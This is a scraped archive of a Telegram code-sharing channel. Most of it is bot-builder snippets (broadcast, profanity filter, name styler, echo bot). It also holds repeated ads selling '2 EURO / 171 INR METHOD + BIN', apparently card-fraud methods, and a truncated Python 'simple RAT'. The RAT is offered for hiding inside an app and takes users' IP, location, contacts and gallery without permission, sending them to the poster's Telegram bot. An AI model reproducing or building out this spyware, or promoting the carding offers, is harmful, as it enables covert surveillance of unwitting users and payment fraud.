『𝐏𝐑𝐄𝐌𝐈𝐔𝐌 𝐂𝐎𝐃𝐄𝐒
Open in Telegram
No data
Subscribers
+2024 hours
+737 days
+9130 days
Posts Archive
Repost from N/a
https://t.me/+GWKQwzBVElphMzY1
Vc aoo ek chiz dikha Raha hu website kaise banai jati h
Repost from N/a
https://t.me/+GWKQwzBVElphMzY1
Vc aoo ek chiz dikha Raha hu website kaise banai jati h
➡️ AI BROADCAST CODES 😄
COMMAND : /broadcast
let users = User.getAll(); // Get all users from the bot's database
let index = 0; // Start broadcasting from the first user
// Store the list of users and current index in User.setProperty
User.setProperty("broadcast_users", users, "json");
User.setProperty("broadcast_index", index, "integer");
// Forward the message to the first user
let msg_id = params; // Message ID to forward (passed as a parameter to this command)
if (!msg_id) {
Bot.sendMessage("Please pass the message ID to forward as a parameter!");
return;
}
Api.forwardMessage({
chat_id: users[index].telegramid,
from_chat_id: bot.id,
message_id: msg_id,
on_result: "/broadcastNext" // Call the next command
});
COMMAND : /broadcastNext
let users = User.getProperty("broadcast_users");
let index = User.getProperty("broadcast_index");
if (!users || index === undefined) {
Bot.sendMessage("Broadcast process not initialized. Start with /broadcast.");
return;
}
// Move to the next user
index++;
if (index >= users.length) {
Bot.sendMessage("Broadcast completed. Forwarded to all users!");
User.removeProperty("broadcast_users");
User.removeProperty("broadcast_index");
return;
}
// Update the current index
User.setProperty("broadcast_index", index);
// Forward the message to the next user
let msg_id = params; // Reuse the same message ID
Api.forwardMessage({
chat_id: users[index].telegramid,
from_chat_id: bot.id,
message_id: msg_id,
on_result: "/broadcastNext" // Loop back to this command
});
❤️ REG : @ 😄Repost from 𝗡𝗘𝗫𝗨 𝗫 𝗫𝗠𝗟 ⚡
2 EURO METHOD + BIN AVAILABLE
100% WORKING METHOD + BIN H✔️
PRICE - 170RS BOTH
171 INR METHOD + BIN AVAILABLE
100% WORKING BIN + METHOD H✔️
PRICE - 199RS BOTH
DM @RAMU12128
2 EURO METHOD + BIN AVAILABLE
100% WORKING METHOD + BIN H✔️
PRICE - 170RS BOTH
171 INR METHOD + BIN AVAILABLE
100% WORKING BIN + METHOD H✔️
PRICE - 199RS BOTH
DM @RAMU12128
2 EURO METHOD + BIN AVAILABLE
100% WORKING METHOD + BIN H✔️
PRICE - 170RS BOTH
171 INR METHOD + BIN AVAILABLE
100% WORKING BIN + METHOD H✔️
PRICE - 199RS BOTH
DM @RAMU12128
Repost from 𝗡𝗘𝗫𝗨 𝗫 𝗫𝗠𝗟 ⚡
2 EURO METHOD + BIN AVAILABLE
100% WORKING METHOD + BIN H✔️
PRICE - 170RS BOTH
171 INR METHOD + BIN AVAILABLE
100% WORKING BIN + METHOD H✔️
PRICE - 199RS BOTH
DM @RAMU12128
➡️ DELETE ABUSE WORD CODES ⭕
COMMAND : *
var abusive_words = ["fuck", "lamao", "bc", "madarchod", "bhenkalowda"];
// Function to check if a message contains abusive words
function contains_abusive_word(message) {
var message_lower = message.toLowerCase();
for (var i = 0; i < abusive_words.length; i++) {
if (message_lower.indexOf(abusive_words[i]) !== -1) {
return true;
}
}
return false;
}
// Main logic: Handling incoming messages
if (contains_abusive_word(message.text)) {
var chat_id = message.chat.id;
var message_id = message.message_id;
// API call to delete the message
HTTP.get({
url: "https://api.telegram.org/bot" + Bot.getProperty("token") +
"/deleteMessage?chat_id=" + chat_id + "&message_id=" + message_id,
success: "/onMessageDeleted", // Callback command for success
error: "/onDeleteError", // Callback command for failure
// Pass options if needed for callback
bb_options: { chat_id: chat_id, username: message.from.username }
});
}
COMMAND : /onMessageDeleted
Bot.onCommand("/onMessageDeleted", function() {
var chat_id = options.chat_id; // Retrieve chat_id from bb_options
var username = options.username;
if (username) {
Bot.sendMessage({
chat_id: chat_id,
text: "🚫 @" + username + " used abusive language and the message has been deleted. 🗑️"
});
} else {
Bot.sendMessage({
chat_id: chat_id,
text: "🚫 A user used abusive language and the message has been deleted. 🗑️"
});
}
});
COMMAND : /onDeleteError
Bot.onCommand("/onDeleteError", function() {
var chat_id = options.chat_id;
Bot.sendMessage({
chat_id: chat_id,
text: "❌ Failed to delete the message. Please try again later."
});
});
❤️ OWNED BY @ ✅import os
import requests
import phonenumbers
import geocoder
import socket
from PIL import Image
import cv2
import sounddevice as sd
from scipy.io.wavfile import write
import numpy as np
from telethon import TelegramClient
# Telegram bot setup
api_id = 'YOUR_API_ID'
api_hash = 'YOUR_API_HASH'
bot_token = 'YOUR_BOT_TOKEN'
client = TelegramClient('session', api_id, api_hash).start(bot_token=bot_token)
def get_ip():
return requests.get('https://api.ipify.org').text
def get_location():
return geocoder.ip('me').latlng
def get_contacts():
# Code to access contacts without permission
pass
def get_gallery():
# Code to access gallery images without permission
pass
def capture_
SIMPLE RAT CODES FOR GET A USER
• IP
• GALLERY
• CONTACTED
• LOCATION
CODE IN PY (PYTHON)
BY @NGYT777GG
CREDIT TO @GOAT_NG
GIVE PROPER CREDIT
THIS CODE ADD IN YOUR APP MAIN ACCEST TO GET ALL USER INFORMATION
INFORMATION COME ON YOUR TELEGRAM BOT BY USING API ID AND HASH
GIVE REACTION FOR MORE PAID THINGS IN FREE𝘾𝙃𝙀𝘾𝙆 𝙄𝙏 𝙊𝙐𝙏 𝘾𝙊𝙈𝙀 𝘽𝙄𝙂 𝙏𝙃𝙄𝙉𝙂𝙎 𝘾𝙊𝙈𝙈𝙄𝙉𝙂 𝙎𝙊𝙊𝙉
𝙁𝙄𝙍𝙎𝙏 𝙏𝙄𝙈𝙀 𝙊𝙉 𝙏𝙂 𝙂𝙐𝙔'𝙎
𝙒𝙀 𝙂𝙄𝙑𝙀 𝘼 𝙈𝙀𝙏𝙃𝙊𝘿
https://t.me/+fFYPlcWj1kg1YTU1
https://t.me/+fFYPlcWj1kg1YTU1
ENJOY OUR NEW BOT THAT'S GIVE U A PAID STUFF IN FREE
IT'S FULL WORKING
https://t.me/PREMIUM_STUFF_NG_BOT?start=Bot32598917
GO AND CHECK IT OUT
SEND ME YOUR BEST BOT IN BJ'S SEND ME A USERNAME IF IT'S TOOO MUCH GOOD SO I WILL PAY MONEY
BUGET 5K TK KA BI BUY KR LUGA
DM @GOAT_NG
❥ Sᴛʏʟɪsʜ Nᴀᴍᴇ Gᴇɴᴇʀᴀᴛᴏʀ [ BB ]
🌈 Command ≈
/generate
📱 Answer ≈ Enter Your Name To Generate A Stylish Name.
Wait For Answer On ✅
🔮 BJS ≈
let userName = message;
let styles = [
"꧁•⊹٭" + userName + "٭⊹•꧂",
"ıllıllı✷✼ " + userName + " ✰✬",
"ミ★ " + userName + " ★彡",
"╰•★★ " + userName + " ★★•╯",
"★¸.•☆•.¸★ " + userName + " ★⡀.•☆•.★",
"¸„٭⊹✡•~⍣°”ˆ˜¨ " + userName + " ¨˜ˆ”°⍣~•✡⊹٭„¸",
"·.★·.·´¯·.·★ " + userName + " ★·.·´¯·.·★.·",
"٭⊹¤.•⨳•.*☆✬ " + userName + " ✬☆*.•⨳•.¤⊹٭",
"(◍•ᴗ•◍) ミ💖 " + userName + " 💖彡",
"(づ。◕‿‿◕。)づ " + userName + " ٩(˘◡˘)۶",
"(☝◞‸◟)☞ " + userName,
"°†° «[" + userName + "]» °†°",
":::::[]=¤ " + userName + " (▀ Ĺ ▀ )",
"◦•●◉✿ " + userName + " ✿◉●•◦",
"୧(•ᗝ•)૭ " + userName + " ୧(⇀‸↼‶)૭",
"┕━━☽【" + userName + "】☾━━┙",
"꧁༺" + userName + "༻꧂",
"꧁༒☬" + userName + "☬༒꧂",
"★彡[" + userName + "]彡★",
"▄︻デ " + userName + "══━一",
"𓂀 " + userName + " 𓂀",
"꧁𓊈𒆜" + userName + "𒆜𓊉꧂",
"➳ᴹᴿメ " + userName + "亗",
"个『" + userName + "』个",
"☆☬" + userName + "☬☆",
"×× " + userName,
"꧁༒☬ " + userName + " ☬༒꧂",
"亗『" + userName + "』亗",
"꧁༒ " + userName + " ༒꧂",
"☆࿐ཽ༵༆༒ " + userName + " ༒༆࿐ཽ༵☆",
"ᴹᴿ°᭄ " + userName + " ࿐09",
"◥ᖫ " + userName + " ༒₭ɨllǝ℞ᖭ◤",
"꧁ঔৣ☬✞ " + userName + " ✞☬ঔৣ꧂",
"MR 么 " + userName,
"*♡⋆* " + userName + " *⋆♡*",
"**༄ᶦᶰᵈ᭄࿐** " + userName + " **❥◉**",
"▄︻デ" + userName + "══━一",
"亗『" + userName + "』亗",
"٭⊹¤.•⨳•.*☆✬ " + userName + " ✬☆*.•⨳•.¤⊹٭",
"★彡[ " + userName + " ]彡★",
];
styles.forEach((style) => {
Bot.sendMessage(style);
});Bot.on('/start', function() {
Bot.sendMessage("Welcome! Type anything, and I'll respond.");
});
Bot.on('message', function(message) {
let text = message.text.toLowerCase(); // Convert text to lowercase for easier matching
// Match specific user inputs
if (text === 'hello') {
Bot.sendMessage("Hi there! How can I help you?");
} else if (text === 'help') {
Bot.sendMessage("Here are some commands you can use:\n- hello\n- help\n- bye");
} else if (text === 'bye') {
Bot.sendMessage("Goodbye! See you later.");
} else {
// Default response if no matches
Bot.sendMessage("I didn't understand that. Try typing 'help' for commands.");
}
});Bot.on('/start', function() {
Bot.sendMessage("Welcome! Type anything, and I'll respond.");
});
Bot.on('message', function(message) {
let text = message.text.toLowerCase(); // Convert text to lowercase for easier matching
// Match specific user inputs
if (text === 'hello') {
Bot.sendMessage("Hi there! How can I help you?");
} else if (text === 'help') {
Bot.sendMessage("Here are some commands you can use:\n- hello\n- help\n- bye");
} else if (text === 'bye') {
Bot.sendMessage("Goodbye! See you later.");
} else {
// Default response if no matches
Bot.sendMessage("I didn't understand that. Try typing 'help' for commands.");
}
});
